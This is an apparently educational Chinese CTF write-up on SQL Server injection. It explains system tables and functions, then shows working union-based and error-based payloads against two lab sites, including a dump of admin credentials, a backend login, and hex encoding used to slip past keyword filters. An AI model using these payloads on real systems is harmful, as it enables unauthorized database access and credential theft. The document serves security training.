CTF-Web：SqlServer SQL 注入

目录

• 相关的函数和表
  • 常用的函数
  • 内置系统表
  • Sysdatabases 表
  • Sysobjects 表
  • Syscolumns 表
• SqlServer 注入样例
  • 任务目标
  • 查找注入点
  • 判断注入类型
  • 判断列数
  • 获取数据库信息
  • 获取敏感信息
• SqlServer 盲注样例
  • 任务目标
  • 判断注入类型
  • 获取数据库名
  • 获取表名
  • 获取字段名

相关的函数和表#

SqlServer 的 SQL 注入和 MySQL 是一样的，不同在于数据库信息所在的表和一些函数不一样。

常用的函数#

函数	功能
db name()	返回当前数据库的名称
host_name()	返回计算机名称
current_user	返回当前数据库的用户名
substring()	字符串截取函数
@@version	查看数据库版本
char()	ASCII 转字符函数
cast(text as type)	字符类型转换，如果转换失败会将 text 结果报错显示在页面上
object_id()	根据表名返回数据库表名 ID
object_name()	根据 ID 返回数据库表名
col_name(object_id,column_id)	返回指定表中指定字段(列）的名称

内置系统表#

Sysdatabases 表#

Sysdatabases 表只保存在 master 数据库中，这个表中保存的是所有的库名，主要字段有：name 数据库名。

Sysobjects 表#

SQLServer 中的每个数据库内都有此系统表，存放着数据库所有的表名。主要字段有：name、id、xtype 分别是表名、表 ID、创建的对象。当 xtype='U'代表是用户建立的表。

Syscolumns 表#

Syscolumns 表位于每个数据库中，存放着数据库所有的字段名。主要字段有：name、id 分别是字段名称、表 ID，其中的 ID 是用 sysobjects 得到的表的 ID 号。

SqlServer 注入样例#

任务目标#

靶场中的公司主页存在 SQL 注入，使用 SQL 注入知识进行一次手工注入测试。

查找注入点#

打开靶场，首先先找找注入点，经判断在搜索框可能存在 sql 注入，但是没有找到传参的地方。

使用 burp 抓包，发现在 cookie 后面夹带了参数 key，值是我们传过去想要查找的值。cookie 一般是用来保持用户的登录状态，也可以存储一些变量。

判断注入类型#

尝试注入个单引号闭合，网页回显 SqlServer 报错，并得到了查询的 sql 语句。

观察得到的 sql 语句，发现不是预编译的，而是通过字符串拼接来组合的，此处可以通过单引号闭合前面的语句，把剩下的语句注释掉，这样就能查询成功。

Copy Highlighter-hljs
"select * from ST_tNews where ST_newstitle like '%"+result+"%'";

判断列数#

判断表有几列，使用 ORDER BY 子句进行一个排序，看一下对几列有效。

经二分法测试，有效的列数有 6 列。


判断哪些列是我们能用的，令 id 参数的查询不到结果，然后使用 UNION 进行组合查询。网页回显了字符串 2 ，说明第 2 列是我们可用的。

Copy Highlighter-hljs
-1%' union all select '1','2','3','4',null,'6'--

获取数据库信息#

爆数据库名，用第 2 个位置作为显示位。SqlServer 的 db_name() 函数可以回显当前使用的数据库，我们将对它进行查询。

Copy Highlighter-hljs
-1%' union all select null,db_name(),null,null,null,null--

接下来开始爆表名，在 sysobjects 进行查询， sysobjects 系统对象表，保存当前数据库的对象，xtype='u'表示查询的是用户创建的表名。

Copy Highlighter-hljs
-1%' union all select null,name,null,null,null,null from sysobjects where xtype='u'--

st_admin 表看上去就是用户名和密码存放的表，所以接下来爆 st_admin 表的字段，在 syscolumns 中以“st_admin”的对象 id 作为过滤条件。

Copy Highlighter-hljs
-1%' union all select null,name,null,null,null,null from syscolumns where id=object_id('st_admin')--

获取敏感信息#

接下来我们爆出 st_admin 表中的信息，这个表有用户名和密码这种敏感信息。

Copy Highlighter-hljs
-1%' union all select null,admin+pass,null,null,null,null from st_admin--

接下来找网站的后台，使用御剑进行后台扫描，直接扫描可以扫出一个 /Admin 目录。

对 /Admin 目录进行扫描，扫出后台登录界面。

使用爆出来的用户名和密码，成功登录后台。

SqlServer 盲注样例#

任务目标#

靶场中的订餐系统存在 SQL 注入，使用 SQL 注入知识进行一次手工注入测试。

判断注入类型#

首先先找找注入点，在公告中看到文章有个 id，可能这个参数存在注入。

尝试注入个单引号闭合，网页回显 SqlServer 报错，但报错的并不是 SQL 语句。

构造一个恒假条件 “and 1=2” 使得查到的结果集为空，网页返回 SQL 语句报错信息，说明此处存在SQL 注入漏洞。

尝试使用 order by 语句，但是网页回显的报错信息不是 SQL 语句，由此可以推断该站点对一些非法字符和关键字进行了过滤。

使用 UNION 语句也是失败，说明联合查询被过滤。

使用十六进制编码也失败，看来这个过滤还是考虑的比较周到。

获取数据库名#

不过由于报错信息是可见的，所以可以使用报错过滤，这是利用了数据库的报错。将我们想要获取的信息显示在报错信息上的方法。此处构造表达式“1=(select db_name())”，由于这个表达式不合法，执行时会出错，所以这个出错的内容就会回显，就获取了数据库名。

Copy Highlighter-hljs
?id=1 and 1=(select db_name()) --

获取表名#

使用相同的方法查找表名，但是由于返回值不唯一导致报了另一个错。

为了使返回值仅有一个条目，限制返回的记录是top 1，也就是查询到的第一条记录。

Copy Highlighter-hljs
?id=1 and 1=(select top 1 name from sysobjects where xtype=u) --

此处直接传参数“u”会报错，可以使用十六进制转码再查询。

Copy Highlighter-hljs
?id=1 and 1=(select top 1 name from sysobjects where xtype=0x75) --

如果想要获取其他行，就需要添加一个过滤条件排除前面几行的返回。

Copy Highlighter-hljs
?id=1 and 1=(select top 1 name from sysobjects where xtype=0x75 and name not in (select top 1 name from sysobjects where xtype=0x75)) --

可以使用 brup 抓包，然后将包发到测试器中，设置有效载荷在过滤条件里面。通过过滤条件依次排除前 n 行，就能获取第 n+1 行数据。

设置填充的数据为 1~30。

为了方便观察，设置返回的数据显示 title 标签。

进行攻击，可以看到获取了所有可以看到的表的表名。

获取字段名#

接下来查询字段名，由于此处要用 sl_admin 表名作为过滤条件，需要根据 SqlServer 的编码进行转码。

使用相同的方式在syscolumns表中获取字段名，过滤条件是表名对应的id。

Copy Highlighter-hljs
?id=1 and 1=(select top 1 name from syscolumns where id=object_id(0x73006C005F00610064006D0069006E00))--

使用相同的方式获取其他行。

Copy Highlighter-hljs
?id=1 and 1=(select top 1 name from syscolumns where id=object_id(0x73006C005F00610064006D0069006E00) and name not in (select top 1 name from syscolumns where id=object_id(0x73006C005F00610064006D0069006E00)))--

发送到 brup 抓包，然后用相同的方式获取所有行。